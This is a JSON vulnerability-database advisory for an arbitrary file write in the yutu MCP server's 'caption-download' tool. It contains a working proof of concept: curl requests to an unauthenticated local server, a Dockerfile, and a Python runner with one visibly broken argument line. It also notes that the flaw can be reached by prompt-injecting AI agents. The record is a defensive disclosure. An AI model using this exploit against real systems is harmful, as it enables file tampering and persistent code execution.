{"id":"CVE-2026-50158","aliases":["GO-2026-5980"],"url":"https://o3.security/vulnerability/CVE-2026-50158","summary":"yutu: Arbitrary File Write via MCP `caption-download` Tool","details":"## Arbitrary File Write via MCP `caption-download` Tool\n\n### Summary\n\nThe `caption-download` MCP tool in yutu passes the caller-supplied `file` parameter directly to `os.Create()` at `pkg/caption/caption.go:272` without any path validation, canonicalization, or confinement to the `pkg.Root` boundary (`YUTU_ROOT`). A local attacker — or any process able to reach the HTTP MCP server — can write arbitrary content to any path writable by the yutu process, entirely outside the intended working directory. This is a **High** severity vulnerability (CVSS 7.7) with high integrity and availability impact.\n\n### Details\n\nyutu uses `pkg.Root` (backed by Go 1.24's `os.OpenRoot`) to restrict all file I/O to the `YUTU_ROOT` directory. Every other caption file-write path honours this boundary:\n\n| Method | Sink | Confined? |\n|--------|------|-----------|\n| `Caption.Insert()` | `pkg.Root.Open(c.File)` (`caption.go:109`) | Yes |\n| `Caption.Update()` | `pkg.Root.Open(c.File)` (`caption.go:193`) | Yes |\n| `Caption.Download()` | `os.Create(c.File)` (`caption.go:272`) | **No** |\n\n`Caption.Download()` is the sole outlier. The attacker-controlled `file` field flows without restriction from the MCP tool input schema to a raw `os.Create()` call:\n\n1. **Source** — `cmd/caption/download.go:32–41`: `downloadInSchema` declares `file` as a required `string` field in the MCP JSON input schema.\n2. **Binding** — `cmd/caption/download.go:61–64`: `cobramcp.GenToolHandler` maps MCP input to `input.Download(writer)`.\n3. **Sink** — `pkg/caption/caption.go:272`: `os.Create(c.File)` creates or truncates the file at the attacker-supplied path.\n4. **Write** — `pkg/caption/caption.go:280`: `file.Write(body)` writes the downloaded caption bytes to that path.\n\n```go\n// cmd/caption/download.go\nvar downloadInSchema = &jsonschema.Schema{\n    Required: []string{\"ids\", \"file\"},          // line 34\n    // ...\n    \"file\": {Type: \"string\", Description: fileUsage},  // line 40\n}\n\n// cobramcp.GenToolHandler binds MCP → handler (line 61-64)\ncobramcp.GenToolHandler(downloadTool, func(input caption.Caption, writer io.Writer) error {\n    return input.Download(writer)\n})\n\n// pkg/caption/caption.go\nbody, err := io.ReadAll(res.Body)   // line 267\nfile, err := os.Create(c.File)      // line 272  ← unconfined sink\n// ...\n_, err = file.Write(body)           // line 280\n```\n\nThe `caption-download` tool is registered by default in `init()` at `cmd/caption/download.go:52`, and the HTTP MCP server starts with `--auth` defaulting to `false` (`cmd/mcp.go:42`), meaning no authentication is required for local HTTP callers.\n\n**Recommended fix:**\n\n```diff\n--- a/pkg/caption/caption.go\n+++ b/pkg/caption/caption.go\n@@\n-       file, err := os.Create(c.File)\n+       file, err := pkg.Root.OpenFile(c.File, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)\n        if err != nil {\n                return errors.Join(errDownloadCaption, err)\n        }\n```\n\n### PoC\n\n**Prerequisites:**\n- yutu `0.0.0-dev` / commit `351c99d`\n- Valid `YUTU_CREDENTIAL` and `YUTU_CACHE_TOKEN` available\n- yutu MCP server running in HTTP mode\n\n**Docker-based reproduction (no live credentials needed):**\n\nThe self-contained PoC builds a binary that exercises `caption.Download()` directly inside a container, with `YUTU_ROOT=/tmp/yutu_safe_root` as the confinement boundary.\n\n```bash\n# From the report workspace root:\ndocker build --no-cache -t yutu-vuln001-poc \\\n    -f vuln-001/Dockerfile \\\n    reports/mcp_49_eat-pray-ai__yutu\n\ndocker run --rm yutu-vuln001-poc\n```\n\nExpected output confirms:\n- `pkg.Root.Open(\"/tmp/poc-arbitrary-write.txt\")` is correctly rejected with `path escapes from parent` (control).\n- `caption.Download()` with `file=\"/tmp/poc-arbitrary-write.txt\"` succeeds and creates a 79-byte file **outside** `YUTU_ROOT` (exploit).\n\n**Live MCP server reproduction:**\n\n```bash\n# Start the HTTP MCP server (no auth by default)\nyutu mcp --mode http --port 8216\n\n# Initialise session\ncurl -sD /tmp/yutu.headers \\\n  -H 'Content-Type: application/json' \\\n  -H 'Accept: application/json, text/event-stream' \\\n  http://localhost:8216/mcp \\\n  -d '{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"initialize\",\"params\":{\"protocolVersion\":\"2025-06-18\",\"capabilities\":{},\"clientInfo\":{\"name\":\"poc\",\"version\":\"1\"}}}' \\\n  >/tmp/yutu.init\n\nSID=$(awk 'tolower($1)==\"mcp-session-id:\"{print $2}' /tmp/yutu.headers | tr -d '\\r')\n\n# Exploit: write caption to arbitrary path\n# Replace CAPTION_ID with a caption id accessible by the configured token\ncurl -s \\\n  -H 'Content-Type: application/json' \\\n  -H 'Accept: application/json, text/event-stream' \\\n  ${SID:+-H \"Mcp-Session-Id: $SID\"} \\\n  http://localhost:8216/mcp \\\n  -d '{\"jsonrpc\":\"2.0\",\"id\":2,\"method\":\"tools/call\",\"params\":{\"name\":\"caption-download\",\"arguments\":{\"ids\":[\"CAPTION_ID\"],\"file\":\"/tmp/yutu-cve-poc.srt\",\"tfmt\":\"srt\"}}}'\n\n# Verify file was written outside YUTU_ROOT\ntest -s /tmp/yutu-cve-poc.srt && ls -l /tmp/yutu-cve-poc.srt\n```\n\n### Impact\n\nThis is an **Arbitrary File Write** vulnerability. Any principal that can invoke the `caption-download` MCP tool — including an unauthenticated local process when the HTTP MCP server is running with default settings (`--auth false`) — can write attacker-controlled bytes to any file path accessible to the yutu process. This bypasses the `YUTU_ROOT` confinement boundary that all other file-write operations in yutu respect.\n\n**Potential consequences include:**\n- Overwriting application binaries, configuration files, or shell startup scripts to achieve persistent code execution.\n- Corrupting log files or database files to cause denial of service.\n- Writing web-accessible files in deployments where yutu runs alongside a web server.\n- Exploitable via prompt injection into an AI agent that uses the yutu MCP server, since the `file` parameter is fully attacker-controlled with no guardrails.\n\nImpacted parties: operators running yutu as an MCP server (HTTP mode, default configuration), AI agent pipelines that expose `caption-download` to untrusted input, and any user whose machine hosts a yutu process that a local attacker can reach.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\n# VULN-001 PoC Dockerfile\n# Build con: reports/mcp_49_eat-pray-ai__yutu/\n# repo/ - the cloned yutu repository\n# vuln-001/ - this workspace (Dockerfile, poc_main.go)\n\nFROM golang:1.26 AS builder\nWORKDIR /build\n\n# Copy the yutu source tree (provides the vulnerable packages)\nCOPY repo/ .\n\n# Inject PoC as a new command package (does not modify existing source)\nRUN mkdir -p cmd/poc_exploit\nCOPY vuln-001/poc_main.go cmd/poc_exploit/main.go\n\n# Build the PoC binary (static, no CGO needed)\nRUN CGO_ENABLED=0 go build -o /poc ./cmd/poc_exploit/\n\n# ── Runtime stage ──────────────────────────────────────────────────────────\nFROM debian:12-slim\n\nCOPY --from=builder /poc /poc\n\n# YUTU_ROOT defines the pkg.Root confinement boundary.\n# The PoC writes to /tmp/poc-arbitrary-write.txt which is OUTSIDE this root,\n# demonstrating the os.Create bypass.\nENV YUTU_ROOT=/tmp/yutu_safe_root\n\nRUN mkdir -p /tmp/yutu_safe_root\n\nCMD [\"/poc\"]\n```\n\n#### `poc.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nVULN-001 PoC Runner\nExploit: Arbitrary File Write via MCP caption-download (CWE-73)\nTarget : pkg/caption/caption.go:272 -- os.Create(c.File) without pkg.Root confinement\n\nUsage: python3 poc.py\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\nVULN_DIR = os.path.dirname(os.path.abspath(__file__))\nCONTEXT_DIR = os.path.dirname(VULN_DIR) # mcp_49_eat-pray-ai__yutu/\nDOCKERFILE = os.path.join(VULN_DIR, \"Dockerfile\")\nIMAGE_NAME = \"yutu-vuln001-poc\"\n\n\ndef run(cmd, check=False, **kwargs):\n print(\"$ \" + \" \".join(str(a) for a in cmd))\n result = subprocess.run(cmd, =True, **kwargs)\n return result\n\n\ndef main():\n print(\"=\" * 70)\n print(\"VULN-001: Arbitrary File Write via MCP caption-download\")\n print(\"CWE-73 | pkg/caption/caption.go:272 | os.Create(c.File)\")\n print(\"=\" * 70)\n\n # ── Build ────────────────────────────────────────────────────────────────\n build_cmd = [\n \"docker\", \"build\",\n \"--no-cache\",\n \"-t\", IMAGE_NAME,\n \"-f\", DOCKERFILE,\n CONTEXT_DIR,\n ]\n print(\"\\n[Step 1] Building Docker image ...\")\n result = run(build_cmd, capture_output=False)\n if result.returncode != 0:\n print(\"\\n[FAIL] Docker build failed.\", file=sys.stderr)\n sys.exit(1)\n\n # ── Run ──────────────────────────────────────────────────────────────────\n run_cmd = [\"docker\", \"run\", \"--rm\", IMAGE_NAME]\n print(\"\\n[Step 2] Running PoC container ...\")\n result = run(run_cmd, capture_output=True)\n\n stdout = result.stdout or \"\"\n stderr = result.stderr or \"\"\n print(stdout, end=\"\")\n if stderr:\n print(stderr, end=\"\", file=sys.stderr)\n\n # ── Verdict ──────────────────────────────────────────────────────────────\n passed = (\n result.returncode == 0\n and \"VULNERABILITY CONFIRMED\" in stdout\n and \"PASS\" in stdout\n and \"os.Create bypasses pkg.Root\" in stdout\n )\n\n if passed:\n print(\"\\n[RESULT] PASS – vulnerability dynamically reproduced.\")\n else:\n print(f\"\\n[RESULT] FAIL – container exit code {result.returncode}.\", file=sys.stderr)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n```","published":"2026-07-14T19:34:47Z","modified":"2026-07-21T19:19:17.309149748Z","cvss":{"score":7.7,"severity":"HIGH","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},"epss":null,"cisaKev":null,"exploitsKnown":null,"affectedPackages":[{"ecosystem":"Go","name":"github.com/eat-pray-ai/yutu","fixedVersion":"0.10.9-dev1"}],"fix":{"url":"https://github.com/eat-pray-ai/yutu/commit/87026c4eee1ed28775383807087343a750707bf3","label":"eat-pray-ai/yutu@87026c4"},"references":[{"type":"WEB","url":"https://github.com/eat-pray-ai/yutu/security/advisories/GHSA-2c7f-fxww-6w6c"},{"type":"WEB","url":"https://github.com/eat-pray-ai/yutu/commit/87026c4eee1ed28775383807087343a750707bf3"},{"type":"PACKAGE","url":"https://github.com/eat-pray-ai/yutu"},{"type":"WEB","url":"https://github.com/eat-pray-ai/yutu/releases/tag/v0.10.9-dev1"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-07-21T19:19:17.309149748Z"}}